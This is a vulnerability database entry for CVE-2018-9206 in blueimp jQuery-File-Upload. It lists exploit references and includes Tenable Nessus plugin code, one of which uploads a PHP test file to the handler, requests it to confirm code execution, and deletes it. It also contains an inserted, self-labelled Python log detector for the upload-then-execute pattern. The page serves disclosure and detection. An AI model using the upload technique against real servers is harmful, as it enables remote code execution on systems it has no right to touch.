Vulnerabilities > CVE-2018-9206 - Unrestricted Upload of File with Dangerous Type vulnerability in Jquery File Upload Project Jquery File Upload
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | HIGH |
Integrity impact | HIGH |
Availability impact | HIGH |
Tags: network, low complexity, jquery-file-upload-project, CWE-434, critical, nessus, exploit available, metasploit
Summary
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Common Weakness Enumeration (CWE)
- CWE-434: Unrestricted Upload of File with Dangerous Type
Common Attack Pattern Enumeration and Classification (CAPEC)
- Accessing Functionality Not Properly Constrained by ACLs: In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality, particularly URLs for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that he is otherwise not supposed to.
- Privilege Abuse: An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems: all control functionality is working as configured, but the configuration does not adequately protect sensitive resources at an appropriate level.
D2sec
name | jQuery File Upload |
url | http://www.d2sec.com/exploits/jquery_file_upload.html |
Exploit-Db
file | exploits/php/remote/45790.rb |
id | EDB-ID:45790 |
last seen | 2018-11-30 |
modified | 2018-11-06 |
platform | php |
published | 2018-11-06 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/45790 |
title | blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit) |
type | remote |

file | exploits/php/webapps/46182.py |
id | EDB-ID:46182 |
last seen | 2019-01-16 |
modified | 2019-01-16 |
platform | php |
port | 80 |
published | 2019-01-16 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/46182 |
title | Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit |
type | webapps |
Metasploit
description | This module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions <= 9.22.0. Due to a default configuration in Apache 2.3.9+, the widget's .htaccess file may be disabled, enabling exploitation of this vulnerability. This vulnerability has been exploited in the wild since at least 2015 and was publicly disclosed to the vendor in 2018. It has been present since the .htaccess change in Apache 2.3.9. This module provides a generic exploit against the jQuery widget. |
id | MSF:EXPLOIT/UNIX/WEBAPP/JQUERY_FILE_UPLOAD |
last seen | 2020-06-14 |
modified | 2019-06-24 |
published | 2018-10-23 |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/jquery_file_upload.rb |
title | blueimp's jQuery (Arbitrary) File Upload |
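The module description above names the exposure: the sample PHP handler ships a .htaccess file in its upload directory, and Apache 2.3.9 and later ignore .htaccess unless AllowOverride is enabled (the default became AllowOverride None), so an uploaded .php file under the handler's files/ directory is served and executed. The following is an added example, not code from this page, from the Metasploit module or from the jQuery-File-Upload project: a Python detector that reads access-log lines in the common "combined" format and flags a client that POSTed successfully to one of the handler endpoints the Nessus check below probes and then fetched a script file under files/ with HTTP 200. The log lines are constructed for the example; the list of script extensions beyond .php and the files/ path convention are assumptions, not facts the page states.

```python
"""Spot the upload-then-execute sequence of CVE-2018-9206 in web access logs.

Added example (not the page's, Metasploit's or the project's code). Assumes the
Apache/nginx "combined" log format; the sample lines below are constructed.
"""
import re
from collections import defaultdict

# Handler endpoints probed by the Nessus remote check on this page; the sample PHP
# handler stores uploads in a sibling "files/" directory (assumption for this example).
UPLOAD_HANDLERS = (
    "/server/php/index.php",
    "/example/upload.php",
    "/php/index.php",
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Extensions PHP commonly executes; the list beyond .php is an assumption.
SCRIPT_EXT_RE = re.compile(r"\.ph(p\d?|tml|ar)$", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    ev["path"] = ev["path"].split("?", 1)[0]  # drop any query string
    return ev


def is_upload_handler(path):
    return any(path.endswith(h) for h in UPLOAD_HANDLERS)


def is_script_under_files(path):
    return "/files/" in path and SCRIPT_EXT_RE.search(path) is not None


def find_upload_then_execute(lines):
    """Return (client_ip, handler_path, script_path) for every client whose POST to an
    upload handler returned 200 and who later fetched a script under files/ with 200."""
    uploads_by_ip = defaultdict(list)
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["status"] == 200 and is_upload_handler(ev["path"]):
            uploads_by_ip[ev["ip"]].append(ev["path"])
        elif ev["method"] == "GET" and ev["status"] == 200 and is_script_under_files(ev["path"]):
            if uploads_by_ip[ev["ip"]]:
                hits.append((ev["ip"], uploads_by_ip[ev["ip"]][-1], ev["path"]))
    return hits


# Constructed sample log: a scanner-style probe (file name mirrors the Nessus check's
# naming), a legitimate image upload, and a blocked request for an old script.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Oct/2018:10:01:02 +0000] "GET /jQuery-File-Upload/server/php/UploadHandler.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [23/Oct/2018:10:01:03 +0000] "POST /jQuery-File-Upload/server/php/index.php HTTP/1.1" 200 143',
    '203.0.113.7 - - [23/Oct/2018:10:01:04 +0000] "GET /jQuery-File-Upload/server/php/files/jqueryfileupload-abcd1234.php HTTP/1.1" 200 88',
    '198.51.100.4 - - [23/Oct/2018:10:05:00 +0000] "POST /jQuery-File-Upload/server/php/index.php HTTP/1.1" 200 143',
    '198.51.100.4 - - [23/Oct/2018:10:05:01 +0000] "GET /jQuery-File-Upload/server/php/files/photo.jpg HTTP/1.1" 200 40211',
    '192.0.2.9 - - [23/Oct/2018:10:07:30 +0000] "GET /jQuery-File-Upload/server/php/files/old.php HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for ip, handler, script in find_upload_then_execute(SAMPLE_LOG):
        print(f"ALERT {ip}: POST {handler} (200) then GET {script} (200)")
```

Only the first client trips the rule: it uploaded through the handler and then retrieved a .php file from files/ with a 200, which is exactly the sequence the Nessus check produces when the host is vulnerable. The image upload and the 403 on old.php are ignored. A 200 for a script under files/ is by itself worth an alert once the .htaccess protection is known to be inactive; the POST correlation just keeps the rule specific.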
Nessus
NASL family | CGI abuses |
NASL id | JQUERY_FILEUPLOAD_RCE.NASL |
description | The version of jQuery-File-Upload running on the remote host is affected by an arbitrary file upload vulnerability. An unauthenticated attacker could leverage this vulnerability to gain access to the host in the context of the web application user. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 118310 |
published | 2018-10-22 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/118310 |
title | jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) |
code |

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(118310);
  script_version("1.14");
  script_cvs_date("Date: 2019/11/27");

  script_cve_id("CVE-2018-9206");

  script_name(english:"jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check)");
  script_summary(english:"Attempts to upload a file and confirm a remote code execution vulnerability exists.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
file upload vulnerability allowing remote code execution.");
  script_set_attribute(attribute:"description", value:
"The version of jQuery-File-Upload running on the remote host is affected
by an arbitrary file upload vulnerability. An unauthenticated attacker
could leverage this vulnerability to gain access to the host in the
context of the web application user.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/blueimp/jQuery-File-Upload/");
  script_set_attribute(attribute:"see_also", value:"http://www.vapidlabs.com/advisory.php?v=204");
  script_set_attribute(attribute:"see_also", value:"https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206");
  # https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-three-years/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?096ac7c1");
  script_set_attribute(attribute:"solution", value:
"Upgrade to blueimp/jQuery-File-Upload version 9.22.1 or later. Additionally
if using a branch of this project, contact the branch maintainer for a
product security update.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9206");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"jQuery File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'blueimps jQuery (Arbitrary) File Upload');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/10/11");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/10/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/10/22");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:jquery-file-upload:jquery-file-upload");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("webmirror3.nbin", "http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("json.inc");

port = get_http_port(default:80, php:TRUE);

# Map of a file that identifies the install to the handler endpoint to test.
urls = {
  "server/php/upload.class.php": "server/php/index.php",
  "jQuery-File-Upload/server/php/upload.class.php": "/jQuery-File-Upload/server/php/index.php",
  "example/upload.php": "example/upload.php",
  "jQuery-File-Upload/example/upload.php": "jQuery-File-Upload/example/upload.php",
  "server/php/UploadHandler.php": "server/php/index.php",
  "jQuery-File-Upload/server/php/UploadHandler.php": "jQuery-File-Upload/server/php/index.php",
  "php/index.php": "php/index.php",
  "jQuery-File-Upload/php/index.php": "jQuery-File-Upload/php/index.php"
};

function http_del(url)
{
  res = http_send_recv3(
    method : "DELETE",
    port : port,
    item : url
  );
  if (res && res[2])
    return [http_last_sent_request(), res[2]];
}

vuln = FALSE;
found = FALSE;

filename = "jqueryfileupload-" + rand_str(length:8) + ".php";
bound = rand_str(length:16, charset:"0123456789abcdef");
boundary = "--" + bound;
postdata =
  boundary + '\r\n' +
  'content-disposition: form-data; name="files"; filename="' + filename + '"\r\n' +
  'content-type: text/plain\r\n' +
  '\r\n' +
  '<?php echo "<html>' + substr(SCRIPT_NAME, 0, strlen(SCRIPT_NAME) - 2) + '"; echo "' + substr(SCRIPT_NAME, strlen(SCRIPT_NAME) - 1) + '</html>" ?>\r\n' +
  boundary + '--\r\n';

if (thorough_tests)
{
  curr_dir = get_kb_item_or_exit("www/" + port + "/content/directory_index");
}
else
{
  curr_dir = "/";
}

foreach url (keys(urls))
{
  # Check for the vulnerable script or required library
  res = http_send_recv3(
    method : "HEAD",
    port : port,
    item : build_url(port:port, qs:curr_dir + url),
    exit_on_fail : TRUE
  );
  if ("200 OK" >< res[0])
  {
    # upload the php file
    res = http_send_recv3(
      method : "POST",
      port : port,
      item : build_url(port:port, qs:curr_dir + urls[url]),
      add_headers : {"Content-Type": "multipart/form-data; boundary=" + bound},
      data : postdata,
      exit_on_fail : TRUE
    );
    if (res && res[2])
    {
      post_req = http_last_sent_request();
      post_res = res[2];
      json = json_read(res[2]);
    }
    else
    {
      audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
    }

    # The handler has used several JSON response layouts across versions.
    if (typeof(json) == "array" && json[0]['files'][0]['name'] && json[0]['files'][0]['url'] && json[0]['files'][0]['deleteUrl'])
    {
      filename2 = json[0]['files'][0]['name'];
      shellurl = json[0]['files'][0]['url'];
      delurl = json[0]['files'][0]['deleteUrl'];
    }
    else if (typeof(json) == "array" && json[0]['0']['name'] && json[0]['0']['url'] && json[0]['0']['delete_url'])
    {
      filename2 = json[0]['0']['name'];
      shellurl = json[0]['0']['url'];
      delurl = json[0]['0']['delete_url'];
    }
    else if (typeof(json) == "array" && json[0]['name'] && json[0]['url'] && json[0]['delete_url'])
    {
      filename2 = json[0]['name'];
      shellurl = json[0]['url'];
      delurl = json[0]['delete_url'];
    }
    else if (typeof(json) == "array" && (json[0]['error'] || json[0]['0']['error'] || json[0]['files'][0]['error']))
      # correctly working script
      audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
    else
    {
      # Not sure what came back. Try to do a delete if we got a 200 in case it worked anyway.
      if ("200 OK" >< res[0])
        http_del(url:build_url(port:port, qs:curr_dir + urls[url]) + '?file=' + filename);
      audit(AUDIT_RESP_BAD, port, "POST " + curr_dir + urls[url]);
    }

    if (filename2 && shellurl && delurl)
    {
      # Did htaccess rewrite it?
      if (filename != filename2 && !pregmatch(pattern:".php$", string:filename2))
      {
        http_del(url:delurl);
        audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
      }
      vuln = TRUE;
    }
    found = TRUE;
    break;
  }
}

if (found && !vuln)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url]));
if (!found)
  audit(AUDIT_WEB_APP_NOT_INST, "jQuery-File-Upload", port);

# test the file
res = http_send_recv3(
  method : "GET",
  port : port,
  item : shellurl
);

# this is a test to see if PHP is executing our upload
if (res && res[2] && SCRIPT_NAME >< res[2])
{
  shell_req = http_last_sent_request();
  shell_res = res[2];
}

# delete the file
out = http_del(url:delurl);
if (out)
{
  del_res = out[1];
  del_req = out[0];
}

if (vuln)
{
  # build request and output:
  request = [];
  output = [];
  if (post_req)
  {
    request = make_list(request, '>>>>>\n' + post_req + '<<<<<\n' + post_res);
  }
  if (shell_req)
  {
    request = make_list(request, '>>>>>\n' + shell_req + '<<<<<\n' + shell_res);
  }
  if (del_req)
  {
    request = make_list(request, '>>>>>\n' + del_req + '<<<<<\n' + del_res);
  }
  security_report_v4(
    port : port,
    severity : SECURITY_HOLE,
    line_limit : 20,
    request : request,
    generic : TRUE
  );
}
exit(0);
NASL family | CGI abuses |
NASL id | ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2019.NASL |
description | According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.6 or 17.x prior to 17.12.9.2 or 18.x prior to 18.8.4.1. It is, therefore, affected by multiple vulnerabilities: (1) an arbitrary file upload vulnerability exists in Blueimp jQuery-File-Upload; an unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host subject to the privileges of the user. (2) A remote command execution vulnerability exists in jackson-databind due to a failure to block various classes from polymorphic deserialization; an unauthenticated, remote attacker can exploit this to execute arbitrary code (CVE-2018-14718, CVE-2018-14719, CVE-2018-14720, CVE-2018-14721). Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 121251 |
published | 2019-01-18 |
reporter | This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/121251 |
title | Oracle Primavera Unifier Multiple Vulnerabilities (Jan 2019 CPU) |
code |

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(121251);
  script_version("1.7");
  script_cvs_date("Date: 2019/11/27");

  script_cve_id(
    "CVE-2018-9206",
    "CVE-2018-14718",
    "CVE-2018-14719",
    "CVE-2018-14720",
    "CVE-2018-14721"
  );

  script_name(english:"Oracle Primavera Unifier Multiple Vulnerabilities (Jan 2019 CPU)");
  script_summary(english:"Checks the version of Oracle Primavera Unifier.");

  script_set_attribute(attribute:"synopsis", value:
"An application running on the remote web server is affected by multiple
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the Oracle Primavera
Unifier installation running on the remote web server is 16.x prior to
16.2.15.6 or 17.x prior to 17.12.9.2 or 18.x prior to 18.8.4.1. It is,
therefore, affected by multiple vulnerabilities:

  - An arbitrary file upload vulnerability exists in Blueimp
    jQuery-File-Upload. An unauthenticated, remote attacker can
    exploit this to upload arbitrary files on the remote host
    subject to the privileges of the user.

  - A remote command execution vulnerability exists in
    jackson-databind due to a failure to block various classes
    from polymorphic deserialization. An unauthenticated, remote
    attacker can exploit this to execute arbitrary code.
    (CVE-2018-14718, CVE-2018-14719, CVE-2018-14720, CVE-2018-14721)

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  # https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?799b2d05");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Oracle Primavera Unifier version 16.2.15.6 / 17.12.9.2 / 18.8.4.1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9206");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"jQuery File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'blueimps jQuery (Arbitrary) File Upload');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"vuln_publication_date", value:"2019/01/11");
  script_set_attribute(attribute:"patch_publication_date", value:"2019/01/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/01/18");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:oracle:primavera_unifier");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("oracle_primavera_unifier.nbin");
  script_require_keys("installed_sw/Oracle Primavera Unifier", "www/weblogic");
  script_require_ports("Services/www", 8002);

  exit(0);
}

include("http.inc");
include("vcf.inc");

get_install_count(app_name:"Oracle Primavera Unifier", exit_if_zero:TRUE);

port = get_http_port(default:8002);
get_kb_item_or_exit("www/weblogic/" + port + "/installed");

app_info = vcf::get_app_info(app:"Oracle Primavera Unifier", port:port);

# Version-only check: the detected version must carry at least three segments.
vcf::check_granularity(app_info:app_info, sig_segments:3);

constraints = [
  { "min_version" : "16.1.0.0", "fixed_version" : "16.2.15.6" },
  { "min_version" : "17.1.0.0", "fixed_version" : "17.12.9.2" },
  { "min_version" : "18.8.0.0", "fixed_version" : "18.8.4.1" }
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
Packetstorm
data source | https://packetstormsecurity.com/files/download/151206/blueimpjqueryfu9220-upload.txt |
id | PACKETSTORM:151206 |
last seen | 2019-01-17 |
published | 2019-01-17 |
reporter | Larry W. Cashdollar |
source | https://packetstormsecurity.com/files/151206/Blueimp-jQuery-File-Upload-9.22.0-Arbitrary-File-Upload.html |
title | Blueimp jQuery File Upload 9.22.0 Arbitrary File Upload |

data source | https://packetstormsecurity.com/files/download/150180/jquery_file_upload.rb.txt |
id | PACKETSTORM:150180 |
last seen | 2018-11-06 |
published | 2018-11-05 |
reporter | Larry W. Cashdollar |
source | https://packetstormsecurity.com/files/150180/blueimp-jQuery-Arbitrary-File-Upload.html |
title | blueimp jQuery Arbitrary File Upload |
References
- http://www.vapidlabs.com/advisory.php?v=204
- https://wpvulndb.com/vulnerabilities/9136
- https://www.exploit-db.com/exploits/45790/
- http://www.securityfocus.com/bid/106629
- https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
- https://www.exploit-db.com/exploits/46182/
- http://www.securityfocus.com/bid/105679